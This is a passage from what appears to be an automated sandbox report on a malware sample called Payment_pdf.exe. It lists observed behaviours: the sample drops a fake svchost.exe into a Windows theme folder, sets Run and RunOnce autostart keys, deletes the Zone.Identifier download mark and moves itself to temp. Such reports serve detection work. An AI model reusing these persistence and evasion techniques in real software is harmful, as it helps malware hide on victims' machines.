                  Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000F.00000003.432580092.0000000004AC6000.00000004.00000001.sdmp
                  Source: Binary string: powrprof.pdb` source: WerFault.exe, 0000000F.00000003.432682433.0000000004C87000.00000004.00000040.sdmp
                  Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp
                  Source: Binary string: edputil.pdb source: WerFault.exe, 0000000F.00000003.432179351.0000000004C8B000.00000004.00000040.sdmp

                  Data Obfuscation:

                  barindex
                  Binary contains a suspicious time stampShow sources
                  Source: initial sampleStatic PE information: 0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]

                  Persistence and Installation Behavior:

                  barindex
                  Drops PE files with benign system namesShow sources
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile created: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeJump to dropped file
                  Drops executables to the windows directory (C:\Windows) and starts themShow sources
                  Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\Resources\Themes\aero\Shell\xwPVuQKYPFmJR\svchost.exe
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile created: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile created: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile created: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                  Source: C:\Users\user\Desktop\Payment_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ueAhUXkoLOMYVCrpZFJump to behavior
                  Creates multiple autostart registry keysShow sources
                  Source: C:\Users\user\Desktop\Payment_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ueAhUXkoLOMYVCrpZFJump to behavior
                  Source: C:\Users\user\Desktop\Payment_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CZVkYJump to behavior
                  Source: C:\Users\user\Desktop\Payment_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ueAhUXkoLOMYVCrpZFJump to behavior
                  Source: C:\Users\user\Desktop\Payment_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ueAhUXkoLOMYVCrpZFJump to behavior
                  Source: C:\Users\user\Desktop\Payment_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ueAhUXkoLOMYVCrpZFJump to behavior
                  Source: C:\Users\user\Desktop\Payment_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ueAhUXkoLOMYVCrpZFJump to behavior
                  Source: C:\Users\user\Desktop\Payment_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CZVkYJump to behavior
                  Source: C:\Users\user\Desktop\Payment_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CZVkYJump to behavior

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                  Source: C:\Users\user\Desktop\Payment_pdf.exeFile opened: C:\Users\user\AppData\Roaming\CZVkY\CZVkY.exe:Zone.Identifier read attributes | delete
                  Moves itself to temp directoryShow sources
                  Source: c:\users\user\desktop\payment_pdf.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG629.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\Payment_pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Resources\Themes\aero\shell\xwPVuQKYPFmJR\svchost.exeProcess information set: NOOPENFILEERRORBOX
